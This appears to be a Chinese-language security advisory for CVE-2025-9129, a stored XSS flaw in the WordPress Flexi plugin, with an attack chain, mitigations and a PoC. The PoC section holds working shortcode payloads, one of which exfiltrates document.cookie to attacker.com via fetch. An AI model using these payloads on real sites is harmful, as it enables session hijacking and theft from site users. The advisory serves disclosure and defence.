CVE-2025-9129 WordPress Flexi插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9129

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Flexi Plugin

漏洞概述

CVE-2025-9129是WordPress Flexi插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Flexi插件的flexi-form-tag短代码（shortcode）处理逻辑中，影响所有4.28及以下版本。漏洞的根本原因是插件对用户提供的短代码属性（attributes）缺乏充分的输入清理（input sanitization）和输出转义（output escaping）机制，导致认证攻击者可以将恶意的JavaScript代码注入到页面中。该漏洞由WordFence安全团队的安全研究员发现并报告，CVSS 3.1评分为6.4分，属于中危级别漏洞。攻击者利用该漏洞需要具备Contributor（投稿者）级别及以上的WordPress账户权限，一旦成功利用，注入的恶意脚本将在其他用户访问受影响页面时自动执行，可能导致会话劫持、敏感信息窃取、权限提升或恶意重定向等严重后果。该漏洞的CVSS向量为AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N，表明漏洞可通过网络远程利用，攻击复杂度低，且由于涉及存储型XSS，影响范围会扩散到所有访问受影响页面的用户。

技术细节

Flexi插件的flexi-form-tag短代码在处理用户输入的属性时，未对用户提供的属性值进行充分的HTML实体编码或转义处理。具体来说，在includes/class-flexi-form.php文件的第572行附近的短代码渲染逻辑中，插件直接将用户控制的属性值输出到生成的HTML页面中，而没有使用WordPress标准的安全函数（如esc_attr()、esc_html()、wp_kses()等）进行适当的转义和过滤。攻击者可以通过构造包含恶意JavaScript代码的短代码属性，例如使用onerror、onload等事件处理器或<script>标签的变体形式，将恶意载荷持久化存储到WordPress数据库中。当其他用户（包括管理员）访问包含该短代码的页面时，浏览器会自动解析并执行注入的恶意脚本。由于该漏洞需要Contributor级别权限才能利用，攻击者通常通过社会工程学手段获取低权限账户，或者利用其他漏洞获取初始访问权限。由于XSS载荷存储在数据库中（存储型），影响范围会随着页面浏览量扩大，危害等级较高。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过社会工程学、购买凭证或利用其他漏洞获取WordPress站点的Contributor（投稿者）级别或以上权限的账户。

STEP 2

步骤2：构造恶意短代码

攻击者构造包含恶意JavaScript代码的flexi-form-tag短代码，利用插件未对短代码属性进行充分过滤的缺陷，将XSS载荷嵌入到属性值中。

STEP 3

步骤3：注入恶意内容

攻击者在WordPress中创建新文章或页面，将构造的恶意短代码插入到内容中并发布。由于是存储型XSS，恶意载荷被持久化存储到数据库中。

STEP 4

步骤4：触发执行

当其他用户（包括管理员、编辑或其他访问者）浏览包含恶意短代码的页面时，浏览器解析HTML并自动执行注入的恶意脚本。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器上下文中执行，可窃取会话Cookie、进行权限提升、植入后门、发起进一步攻击或窃取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-9129: Flexi Plugin Stored XSS via flexi-form-tag shortcode -->
<!-- Attacker with contributor-level access injects the following shortcode into a post/page -->

[flexi-form-tag label="</label><script>alert(document.cookie)</script>" type="text" name="xss_test"]

<!-- Alternative payloads using event handlers -->

[flexi-form-tag label="Click Here" type="text" name="xss2" onmouseover="alert('XSS-'+document.domain)"]

[flexi-form-tag label="<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>" type="text" name="xss3"]

<!-- Steps to reproduce:
     1. Login as Contributor or higher role user
     2. Create a new post or page
     3. Insert the malicious shortcode above into the content
     4. Publish/save the post
     5. When any user (including admin) views the post, the XSS payload executes
-->

影响范围

WordPress Flexi Plugin <= 4.28

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制Contributor及以上角色的用户创建包含短代码的内容；2）部署WAF规则过滤包含<script>标签、onerror、onload等事件处理器以及javascript:协议的请求；3）启用WordPress的内容安全策略（CSP）头部以限制内联脚本执行；4）定期审查已发布的内容，查找并清理可能存在的恶意短代码注入；5）监控用户活动日志，及时发现可疑的内容创建行为。